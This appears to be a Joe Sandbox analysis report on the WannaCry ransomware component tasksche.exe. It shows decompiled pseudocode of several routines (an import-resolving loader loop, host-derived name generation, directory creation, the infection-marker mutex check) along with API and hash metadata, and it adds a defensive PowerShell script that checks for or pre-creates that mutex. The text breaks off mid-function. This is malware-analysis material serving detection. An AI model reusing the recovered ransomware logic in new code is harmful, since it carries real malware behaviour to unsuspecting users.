                                                                                                                                                				_t38 =  *((intOrPtr*)( *_t33));
                                                                                                                                                				 *((intOrPtr*)(_t42 - 0x78)) = _t38;
                                                                                                                                                				_push(_t33);
                                                                                                                                                				_push(_t38);
                                                                                                                                                				L0040791E();
                                                                                                                                                				return _t33;
                                                                                                                                                			}
                                                                                                                                                0x00407831
                                                                                                                                                0x00407836
                                                                                                                                                0x0040783d
                                                                                                                                                0x00407842
                                                                                                                                                0x00407847
                                                                                                                                                0x0040784c
                                                                                                                                                0x00407851
                                                                                                                                                0x00407856
                                                                                                                                                0x0040786f
                                                                                                                                                0x00407875
                                                                                                                                                0x0040787a
                                                                                                                                                0x0040787f
                                                                                                                                                0x0040788c
                                                                                                                                                0x0040788e
                                                                                                                                                0x00407894
                                                                                                                                                0x004078d0
                                                                                                                                                0x004078d0
                                                                                                                                                0x004078d3
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004078d5
                                                                                                                                                0x004078d6
                                                                                                                                                0x004078d6
                                                                                                                                                0x00407896
                                                                                                                                                0x00407896
                                                                                                                                                0x00407896
                                                                                                                                                0x00407897
                                                                                                                                                0x0040789a
                                                                                                                                                0x0040789c
                                                                                                                                                0x004078a7
                                                                                                                                                0x004078a9
                                                                                                                                                0x004078a9
                                                                                                                                                0x004078aa
                                                                                                                                                0x004078aa
                                                                                                                                                0x004078a7
                                                                                                                                                0x004078ad
                                                                                                                                                0x004078ad
                                                                                                                                                0x004078b1
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004078b7
                                                                                                                                                0x004078be
                                                                                                                                                0x004078c4
                                                                                                                                                0x004078c8
                                                                                                                                                0x004078dd
                                                                                                                                                0x004078ca
                                                                                                                                                0x004078ca
                                                                                                                                                0x004078ca
                                                                                                                                                0x004078e9
                                                                                                                                                0x004078ee
                                                                                                                                                0x004078f2
                                                                                                                                                0x004078f8
                                                                                                                                                0x004078fd
                                                                                                                                                0x004078ff
                                                                                                                                                0x00407902
                                                                                                                                                0x00407903
                                                                                                                                                0x00407904
                                                                                                                                                0x0040790b

                                                                                                                                                APIs
                                                                                                                                                • __setusermatherr.MSVCRT(0040793C), ref: 00407836
                                                                                                                                                  • Part of subcall function 0040792A: _controlfp.MSVCRT(00010000,00030000,00407842), ref: 00407934
                                                                                                                                                • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                                                                                                                                                • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                                                                                                                                                • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                                                                                                                                                • GetStartupInfoA.KERNEL32(?), ref: 004078BE
                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
                                                                                                                                                • exit.MSVCRT(00000000,00000000,?,?,?,?), ref: 004078F2
                                                                                                                                                • _XcptFilter.MSVCRT(?,?,?,?,?,?), ref: 00407904
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__setusermatherr_controlfpexit
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2141228402-0
                                                                                                                                                • Opcode ID: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                                                                                                                                                • Instruction ID: 738ed170af38765147f9c33b7b7214e7a7d60aeb9597ff7827fffae83538cc25
                                                                                                                                                • Opcode Fuzzy Hash: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                                                                                                                                                • Instruction Fuzzy Hash: F52135B2C04258AEEB20AFA5DD48AAD7BB8AF05304F24443FF581B7291D7786841CB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                			E004027DF(signed int* _a4) {
                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                				signed int _v12;
                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                				intOrPtr* _t50;
                                                                                                                                                				intOrPtr _t53;
                                                                                                                                                				intOrPtr _t55;
                                                                                                                                                				void* _t58;
                                                                                                                                                				void _t60;
                                                                                                                                                				signed int _t63;
                                                                                                                                                				signed int _t67;
                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                				void* _t73;
                                                                                                                                                				signed int _t75;
                                                                                                                                                				intOrPtr _t87;
                                                                                                                                                				intOrPtr* _t88;
                                                                                                                                                				intOrPtr* _t90;
                                                                                                                                                				void* _t91;
                                                                                                                                                
                                                                                                                                                				_t90 = _a4;
                                                                                                                                                				_t2 = _t90 + 4; // 0x4be8563c
                                                                                                                                                				_t87 =  *_t2;
                                                                                                                                                				_t50 =  *_t90 + 0x80;
                                                                                                                                                				_t75 = 1;
                                                                                                                                                				_v16 = _t87;
                                                                                                                                                				_v12 = _t75;
                                                                                                                                                				if( *((intOrPtr*)(_t50 + 4)) != 0) {
                                                                                                                                                					_t73 =  *_t50 + _t87;
                                                                                                                                                					if(IsBadReadPtr(_t73, 0x14) != 0) {
                                                                                                                                                						L25:
                                                                                                                                                						return _v12;
                                                                                                                                                					}
                                                                                                                                                					while(1) {
                                                                                                                                                						_t53 =  *((intOrPtr*)(_t73 + 0xc));
                                                                                                                                                						if(_t53 == 0) {
                                                                                                                                                							goto L25;
                                                                                                                                                						}
                                                                                                                                                						_t8 = _t90 + 0x30; // 0xc085d0ff
                                                                                                                                                						_t55 =  *((intOrPtr*)(_t90 + 0x24))(_t53 + _t87,  *_t8);
                                                                                                                                                						_v8 = _t55;
                                                                                                                                                						if(_t55 == 0) {
                                                                                                                                                							SetLastError(0x7e);
                                                                                                                                                							L23:
                                                                                                                                                							_v12 = _v12 & 0x00000000;
                                                                                                                                                							goto L25;
                                                                                                                                                						}
                                                                                                                                                						_t11 = _t90 + 0xc; // 0x317459c0
                                                                                                                                                						_t14 = _t90 + 8; // 0x85000001
                                                                                                                                                						_t58 = realloc( *_t14, 4 +  *_t11 * 4);
                                                                                                                                                						if(_t58 == 0) {
                                                                                                                                                							_t40 = _t90 + 0x30; // 0xc085d0ff
                                                                                                                                                							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t40);
                                                                                                                                                							SetLastError(0xe);
                                                                                                                                                							goto L23;
                                                                                                                                                						}
                                                                                                                                                						_t15 = _t90 + 0xc; // 0x317459c0
                                                                                                                                                						 *(_t90 + 8) = _t58;
                                                                                                                                                						 *((intOrPtr*)(_t58 +  *_t15 * 4)) = _v8;
                                                                                                                                                						 *(_t90 + 0xc) =  *(_t90 + 0xc) + 1;
                                                                                                                                                						_t60 =  *_t73;
                                                                                                                                                						if(_t60 == 0) {
                                                                                                                                                							_t88 = _t87 +  *((intOrPtr*)(_t73 + 0x10));
                                                                                                                                                							_a4 = _t88;
                                                                                                                                                						} else {
                                                                                                                                                							_t88 =  *((intOrPtr*)(_t73 + 0x10)) + _v16;
                                                                                                                                                							_a4 = _t60 + _t87;
                                                                                                                                                						}
                                                                                                                                                						while(1) {
                                                                                                                                                							_t63 =  *_a4;
                                                                                                                                                							if(_t63 == 0) {
                                                                                                                                                								break;
                                                                                                                                                							}
                                                                                                                                                							if((_t63 & 0x80000000) == 0) {
                                                                                                                                                								_t32 = _t90 + 0x30; // 0xc085d0ff
                                                                                                                                                								_push( *_t32);
                                                                                                                                                								_t67 = _t63 + _v16 + 2;
                                                                                                                                                							} else {
                                                                                                                                                								_t30 = _t90 + 0x30; // 0xc085d0ff
                                                                                                                                                								_push( *_t30);
                                                                                                                                                								_t67 = _t63 & 0x0000ffff;
                                                                                                                                                							}
                                                                                                                                                							_t68 =  *((intOrPtr*)(_t90 + 0x28))(_v8, _t67);
                                                                                                                                                							_t91 = _t91 + 0xc;
                                                                                                                                                							 *_t88 = _t68;
                                                                                                                                                							if(_t68 == 0) {
                                                                                                                                                								_v12 = _v12 & 0x00000000;
                                                                                                                                                								break;
                                                                                                                                                							} else {
                                                                                                                                                								_a4 =  &(_a4[1]);
                                                                                                                                                								_t88 = _t88 + 4;
                                                                                                                                                								continue;
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                						if(_v12 == 0) {
                                                                                                                                                							_t45 = _t90 + 0x30; // 0xc085d0ff
                                                                                                                                                							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t45);
                                                                                                                                                							SetLastError(0x7f);
                                                                                                                                                							goto L25;
                                                                                                                                                						}
                                                                                                                                                						_t73 = _t73 + 0x14;
                                                                                                                                                						if(IsBadReadPtr(_t73, 0x14) == 0) {
                                                                                                                                                							_t87 = _v16;
                                                                                                                                                							continue;
                                                                                                                                                						}
                                                                                                                                                						goto L25;
                                                                                                                                                					}
                                                                                                                                                					goto L25;
                                                                                                                                                				}
                                                                                                                                                				return _t75;
                                                                                                                                                			}
                                                                                                                                                0x00402822
                                                                                                                                                0x00000000
                                                                                                                                                0x00402822
                                                                                                                                                0x00000000
                                                                                                                                                0x004028ea
                                                                                                                                                0x00000000
                                                                                                                                                0x00402825
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
                                                                                                                                                • realloc.MSVCRT(85000001,317459C0), ref: 00402854
                                                                                                                                                • IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Read$realloc
                                                                                                                                                • String ID: ?!@
                                                                                                                                                • API String ID: 1241503663-708128716
                                                                                                                                                • Opcode ID: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                                                                                                                                                • Instruction ID: b911edbb3638e6438919fa35cb7379f64586f657f287b8edbc273cd359ebb62a
                                                                                                                                                • Opcode Fuzzy Hash: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                                                                                                                                                • Instruction Fuzzy Hash: 4841AE76A00205EFDB109F55CE49B5ABBF4FF44310F24803AE846B62D1D7B8E900DB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                			E00401225(intOrPtr _a4) {
                                                                                                                                                				signed int _v8;
                                                                                                                                                				long _v12;
                                                                                                                                                				void _v410;
                                                                                                                                                				long _v412;
                                                                                                                                                				long _t34;
                                                                                                                                                				signed int _t42;
                                                                                                                                                				intOrPtr _t44;
                                                                                                                                                				signed int _t45;
                                                                                                                                                				signed int _t48;
                                                                                                                                                				int _t54;
                                                                                                                                                				signed int _t56;
                                                                                                                                                				signed int _t60;
                                                                                                                                                				signed int _t61;
                                                                                                                                                				signed int _t62;
                                                                                                                                                				void* _t71;
                                                                                                                                                				signed short* _t72;
                                                                                                                                                				void* _t76;
                                                                                                                                                				void* _t77;
                                                                                                                                                 
                                                                                                                                                 				// _a4 receives the generated name; _v412 is a local wide-char buffer for the computer name
                                                                                                                                                 				_t34 =  *0x40f874; // 0x0
                                                                                                                                                 				_v412 = _t34;
                                                                                                                                                 				_t56 = 0x63;
                                                                                                                                                 				_v12 = 0x18f;
                                                                                                                                                 				memset( &_v410, 0, _t56 << 2); // zero the computer-name buffer (0x63 dwords plus a trailing word)
                                                                                                                                                 				asm("stosw");
                                                                                                                                                 				GetComputerNameW( &_v412,  &_v12);
                                                                                                                                                 				_v8 = _v8 & 0x00000000;
                                                                                                                                                 				_t54 = 1;
                                                                                                                                                 				// PRNG seed = product of every UTF-16 code unit of the computer name (stays 1 if the name is empty)
                                                                                                                                                 				if(wcslen( &_v412) > 0) {
                                                                                                                                                 					_t72 =  &_v412;
                                                                                                                                                 					do {
                                                                                                                                                 						_t54 = _t54 * ( *_t72 & 0x0000ffff);
                                                                                                                                                 						_v8 = _v8 + 1;
                                                                                                                                                 						_t72 =  &(_t72[1]);
                                                                                                                                                 					} while (_v8 < wcslen( &_v412));
                                                                                                                                                 				}
                                                                                                                                                 				srand(_t54); // the name is therefore deterministic per host
                                                                                                                                                 				_t42 = rand();
                                                                                                                                                 				_t71 = 0;
                                                                                                                                                 				asm("cdq");
                                                                                                                                                 				_t60 = 8;
                                                                                                                                                 				_t76 = _t42 % _t60 + _t60; // letter count: rand() % 8 + 8, i.e. 8 to 15
                                                                                                                                                 				if(_t76 > 0) {
                                                                                                                                                 					do {
                                                                                                                                                 						_t48 = rand();
                                                                                                                                                 						asm("cdq");
                                                                                                                                                 						_t62 = 0x1a;
                                                                                                                                                 						 *((char*)(_t71 + _a4)) = _t48 % _t62 + 0x61; // 'a' + rand() % 26
                                                                                                                                                 						_t71 = _t71 + 1;
                                                                                                                                                 					} while (_t71 < _t76);
                                                                                                                                                 				}
                                                                                                                                                 				_t77 = _t76 + 3; // then append three decimal digits
                                                                                                                                                 				while(_t71 < _t77) {
                                                                                                                                                 					_t45 = rand();
                                                                                                                                                 					asm("cdq");
                                                                                                                                                 					_t61 = 0xa;
                                                                                                                                                 					 *((char*)(_t71 + _a4)) = _t45 % _t61 + 0x30; // '0' + rand() % 10
                                                                                                                                                 					_t71 = _t71 + 1;
                                                                                                                                                 				}
                                                                                                                                                 				_t44 = _a4;
                                                                                                                                                 				 *(_t71 + _t44) =  *(_t71 + _t44) & 0x00000000; // NUL-terminate the 11- to 18-character name
                                                                                                                                                 				return _t44; // returns the caller-supplied buffer
                                                                                                                                                 			}

                                                                                                                                                 Instruction addresses (disassembly column not captured in this extract): 0x0040122e, 0x00401239, 0x00401240, 0x00401249, 0x00401250, 0x00401252, 0x0040125f, 0x0040126b, 0x00401277, 0x0040127e, 0x00401280, 0x00401286, 0x00401289, 0x0040128c, 0x00401297, 0x0040129d, 0x00401286, 0x004012a1, 0x004012ae, 0x004012b2, 0x004012b4, 0x004012b5, 0x004012ba, 0x004012be, 0x004012c0, 0x004012c0, 0x004012c4, 0x004012c5, 0x004012ce, 0x004012d1, 0x004012d2, 0x004012c0, 0x004012d6, 0x004012d9, 0x004012dd, 0x004012e1, 0x004012e2, 0x004012eb, 0x004012ee, 0x004012ee, 0x004012f1, 0x004012f4, 0x004012fc

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: rand$wcslen$ComputerNamesrand
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3058258771-0
                                                                                                                                                • Opcode ID: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                                                                                                                                                • Instruction ID: 153b78e0bdef4b648922335b0398b7079fc1e42e5dbb3c53d325bf346215f47a
                                                                                                                                                • Opcode Fuzzy Hash: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                                                                                                                                                • Instruction Fuzzy Hash: FA212833A00318ABD7119B65ED81BDD77A8EB45354F1100BBF948F71C0CA759EC28BA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00407070(char* _a4, char* _a8) {
                                                                                                                                                				char _v264;
                                                                                                                                                				void _v524;
                                                                                                                                                				long _t16;
                                                                                                                                                				char* _t30;
                                                                                                                                                				char* _t31;
                                                                                                                                                				char* _t36;
                                                                                                                                                				char* _t38;
                                                                                                                                                				int _t40;
                                                                                                                                                				void* _t41;
                                                                                                                                                
                                                                                                                                                				_t30 = _a4;
                                                                                                                                                				if(_t30 != 0 && GetFileAttributesA(_t30) == 0xffffffff) {
                                                                                                                                                					CreateDirectoryA(_t30, 0);
                                                                                                                                                				}
                                                                                                                                                				_t36 = _a8;
                                                                                                                                                				_t16 =  *_t36;
                                                                                                                                                				if(_t16 != 0) {
                                                                                                                                                					_t38 = _t36;
                                                                                                                                                					_t31 = _t36;
                                                                                                                                                					do {
                                                                                                                                                						if(_t16 == 0x2f || _t16 == 0x5c) {
                                                                                                                                                							_t38 = _t31;
                                                                                                                                                						}
                                                                                                                                                						_t16 = _t31[1];
                                                                                                                                                						_t31 =  &(_t31[1]);
                                                                                                                                                					} while (_t16 != 0);
                                                                                                                                                					if(_t38 != _t36) {
                                                                                                                                                						_t40 = _t38 - _t36;
                                                                                                                                                						memcpy( &_v524, _t36, _t40);
                                                                                                                                                						 *(_t41 + _t40 - 0x208) =  *(_t41 + _t40 - 0x208) & 0x00000000;
                                                                                                                                                						E00407070(_t30,  &_v524);
                                                                                                                                                					}
                                                                                                                                                					_v264 = _v264 & 0x00000000;
                                                                                                                                                					if(_t30 != 0) {
                                                                                                                                                						strcpy( &_v264, _t30);
                                                                                                                                                					}
                                                                                                                                                					strcat( &_v264, _t36);
                                                                                                                                                					_t16 = GetFileAttributesA( &_v264);
                                                                                                                                                					if(_t16 == 0xffffffff) {
                                                                                                                                                						return CreateDirectoryA( &_v264, 0);
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				return _t16;
                                                                                                                                                			}













APIs
• GetFileAttributesA.KERNEL32(?,?,?), ref: 00407083
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00407091
• memcpy.MSVCRT(?,0000002F,0000002F,?,?,?), ref: 004070CA
• strcpy.MSVCRT(00000000,?,?,?), ref: 004070FB
• strcat.MSVCRT(00000000,0000002F,?,?), ref: 0040710A
• GetFileAttributesA.KERNEL32(00000000,?,?), ref: 00407118
• CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C
Memory Dump Source
• Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
Yara matches
Similarity
• API ID: AttributesCreateDirectoryFile$memcpystrcatstrcpy
• String ID:
• API String ID: 2935503933-0
• Opcode ID: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
• Instruction ID: 50ba023859918e707bf45bf33fbe73a6a33da9a39eec2eddc6b78618a8cc3524
• Opcode Fuzzy Hash: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
• Instruction Fuzzy Hash: 1A112B72C0821456CB305B749D88FD7776C9B11320F1403BBE595B32C2DA78BD898669
Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00401EFF(intOrPtr _a4) {
                                                                                                                                                				char _v104;
                                                                                                                                                				void* _t9;
                                                                                                                                                				void* _t11;
                                                                                                                                                				void* _t12;
                                                                                                                                                
                                                                                                                                                				sprintf( &_v104, "%s%d", "Global\\MsWinZonesCacheCounterMutexA", 0);
                                                                                                                                                				_t12 = 0;
                                                                                                                                                				if(_a4 <= 0) {
                                                                                                                                                					L3:
                                                                                                                                                					return 0;
                                                                                                                                                				} else {
                                                                                                                                                					goto L1;
                                                                                                                                                				}
                                                                                                                                                				while(1) {
                                                                                                                                                					L1:
                                                                                                                                                					_t9 = OpenMutexA(0x100000, 1,  &_v104);
                                                                                                                                                					if(_t9 != 0) {
                                                                                                                                                						break;
                                                                                                                                                					}
                                                                                                                                                					Sleep(0x3e8);
                                                                                                                                                					_t12 = _t12 + 1;
                                                                                                                                                					if(_t12 < _a4) {
                                                                                                                                                						continue;
                                                                                                                                                					}
                                                                                                                                                					goto L3;
                                                                                                                                                				}
                                                                                                                                                				CloseHandle(_t9);
                                                                                                                                                				_t11 = 1;
                                                                                                                                                				return _t11;
                                                                                                                                                			}








APIs
• sprintf.MSVCRT(?,%s%d,Global\MsWinZonesCacheCounterMutexA,00000000), ref: 00401F16
• OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
• Sleep.KERNEL32(000003E8), ref: 00401F40
• CloseHandle.KERNEL32(00000000), ref: 00401F52
Strings
Memory Dump Source
• Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
Yara matches
Similarity
• API ID: CloseHandleMutexOpenSleepsprintf
• String ID: %s%d$Global\MsWinZonesCacheCounterMutexA
• API String ID: 2780352083-2959021817
• Opcode ID: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
• Instruction ID: f4a3b48a0bafa41ae68b0177be176e29d76f271436d11399ade0a1af8f7a19ee
• Opcode Fuzzy Hash: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
• Instruction Fuzzy Hash: 92F0E931A40305BBDB20EBA49E4AB9B7758AB04B40F104036F945FA0D2DBB8D54586D8
Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%
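The routine E00401EFF above is the sample's mutex check. sprintf("%s%d", "Global\MsWinZonesCacheCounterMutexA", 0) yields the name Global\MsWinZonesCacheCounterMutexA0 (the trailing 0 is part of the name; published indicators that omit it are quoting the format argument, not the string the sample opens). The loop then calls OpenMutexA(0x100000 = SYNCHRONIZE, TRUE, name) once per second for at most _a4 attempts and returns 1 as soon as the mutex can be opened, 0 otherwise (immediately, when _a4 is 0 or negative). What the caller does with that result is outside this excerpt; this is the object that the publicly circulated WannaCry "vaccines" pre-create. The PowerShell below is an added example for this report, not code from the sample or from Joe Sandbox: it reproduces the same existence test and polling loop from the defender's side for host triage, and includes a helper that holds the mutex open. The function names, the attempt-count parameter and the vaccine helper are this example's own design (assumptions), not anything the report shows.

```powershell
# Added example for this report, not code from the sample or from Joe Sandbox.
# Reproduces the check in E00401EFF from the defender's side. Function names
# and the vaccine helper are this example's own choices (assumptions).

# sprintf("%s%d", "Global\MsWinZonesCacheCounterMutexA", 0) in the decompiled
# routine produces exactly this name (note the trailing 0). The Global\ prefix
# puts the object in the session-independent namespace, so the check sees it
# from any logon session.
$WannaCryMutexName = 'Global\MsWinZonesCacheCounterMutexA' + 0

function Test-NamedMutex {
    # Equivalent of OpenMutexA(SYNCHRONIZE, ..., $Name) != 0.
    param([Parameter(Mandatory)][string]$Name)
    try {
        $m = [System.Threading.Mutex]::OpenExisting($Name)
        $m.Close()
        return $true
    } catch [System.Threading.WaitHandleCannotBeOpenedException] {
        return $false   # no kernel object with that name
    } catch [System.UnauthorizedAccessException] {
        return $true    # the object exists; we only lack rights to open it
    }
}

function Wait-NamedMutex {
    # Same loop shape as the sample: test, Sleep(1000), retry, at most
    # $Attempts times; $Attempts -le 0 returns $false without testing, as the
    # _a4 <= 0 branch in E00401EFF does.
    param([Parameter(Mandatory)][string]$Name, [int]$Attempts = 1)
    for ($i = 0; $i -lt $Attempts; $i++) {
        if (Test-NamedMutex -Name $Name) { return $true }
        Start-Sleep -Seconds 1
    }
    return $false
}

function New-HeldMutex {
    # "Vaccine" helper: create the mutex so the sample's check succeeds.
    # A named mutex exists only while some handle to it is open, so keep the
    # returned object (and the process owning it) alive for as long as the
    # protection is wanted.
    param([Parameter(Mandatory)][string]$Name)
    $createdNew = $false
    $m = New-Object System.Threading.Mutex($false, $Name, [ref]$createdNew)
    if (-not $createdNew) {
        $m.Close()
        throw "Mutex '$Name' already exists; another process is holding it."
    }
    return $m
}

# Triage: a hit means either the sample already ran in this boot session or
# a vaccine is holding the name. Confirm with process and file evidence
# (e.g. tasksche.exe, which the memory dump above was taken from) before
# concluding either way.
if (Test-NamedMutex -Name $WannaCryMutexName) {
    Write-Warning "$WannaCryMutexName is present on this host"
} else {
    Write-Output "$WannaCryMutexName is not present"
}
```

Run it as-is for a one-shot check, or call `Wait-NamedMutex -Name $WannaCryMutexName -Attempts 5` to mirror the sample's polling. `New-HeldMutex` must be called from a long-lived process (a scheduled task or service, for example), because the object disappears the moment the last handle closes, and its presence cannot by itself distinguish an earlier infection from a vaccine.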

                                                                                                                                                C-Code - Quality: 59%
E00403A77(void* __ecx, void* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
	void* _v12;
	char _v16;
	intOrPtr _v32;
	intOrPtr _v36;
	intOrPtr _v48;
	signed int _t121;
	int _t124;
	intOrPtr* _t126;
	intOrPtr _t127;
	int _t131;
	intOrPtr* _t133;
	intOrPtr _t135;
	intOrPtr _t137;
	signed int _t139;
	signed int _t140;
	signed int _t143;
	signed int _t150;
	intOrPtr _t160;
	int _t161;
	int _t163;
	signed int _t164;
	signed int _t165;
	intOrPtr _t168;
	void* _t169;
	signed int _t170;
	signed int _t172;
	signed int _t175;
	signed int _t178;
	intOrPtr _t194;
	void* _t195;
	void* _t196;
	void* _t197;
	intOrPtr _t198;
	void* _t201;

	_t197 = __ecx;
	if( *((intOrPtr*)(__ecx + 4)) == 0) {
		__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
		_push(0x40d570);
		_push( &_v16);
		L0040776E();
	}
	_t121 = _a12;
	if(_t121 == 0) {
		L15:
		__imp__??0exception@@QAE@ABQBD@Z(0x40f574);
		_push(0x40d570);
		_push( &_v16);
		L0040776E();
		_push( &_v16);
		_push(0);
		_push(_t197);
		_t198 = _v36;
		_t194 = _v32;
		_t168 =  *((intOrPtr*)(_t198 + 0x30));
		_t160 =  *((intOrPtr*)(_t198 + 0x34));
		_t71 = _t194 + 0xc; // 0x40d568
		_v48 =  *_t71;
		_v32 = _t168;
		if(_t168 > _t160) {
			_t160 =  *((intOrPtr*)(_t198 + 0x2c));
		}
		_t75 = _t194 + 0x10; // 0x19930520
		_t124 =  *_t75;
		_t161 = _t160 - _t168;
		if(_t161 > _t124) {
			_t161 = _t124;
		}
		if(_t161 != 0 && _a8 == 0xfffffffb) {
			_a8 = _a8 & 0x00000000;
		}
		 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t161;
		 *(_t194 + 0x10) = _t124 - _t161;
		_t126 =  *((intOrPtr*)(_t198 + 0x38));
		if(_t126 != 0) {
			_t137 =  *_t126( *((intOrPtr*)(_t198 + 0x3c)), _t168, _t161);
			 *((intOrPtr*)(_t198 + 0x3c)) = _t137;
			_t201 = _t201 + 0xc;
			 *((intOrPtr*)(_t194 + 0x30)) = _t137;
		}
		if(_t161 != 0) {
			memcpy(_v12, _a4, _t161);
			_v12 = _v12 + _t161;
			_t201 = _t201 + 0xc;
			_a4 = _a4 + _t161;
		}
		_t127 =  *((intOrPtr*)(_t198 + 0x2c));
		if(_a4 == _t127) {
			_t169 =  *((intOrPtr*)(_t198 + 0x28));
			_a4 = _t169;
			if( *((intOrPtr*)(_t198 + 0x34)) == _t127) {
				 *((intOrPtr*)(_t198 + 0x34)) = _t169;
			}
			_t99 = _t194 + 0x10; // 0x19930520
			_t131 =  *_t99;
			_t163 =  *((intOrPtr*)(_t198 + 0x34)) - _t169;
			if(_t163 > _t131) {
				_t163 = _t131;
			}
			if(_t163 != 0 && _a8 == 0xfffffffb) {
				_a8 = _a8 & 0x00000000;
			}
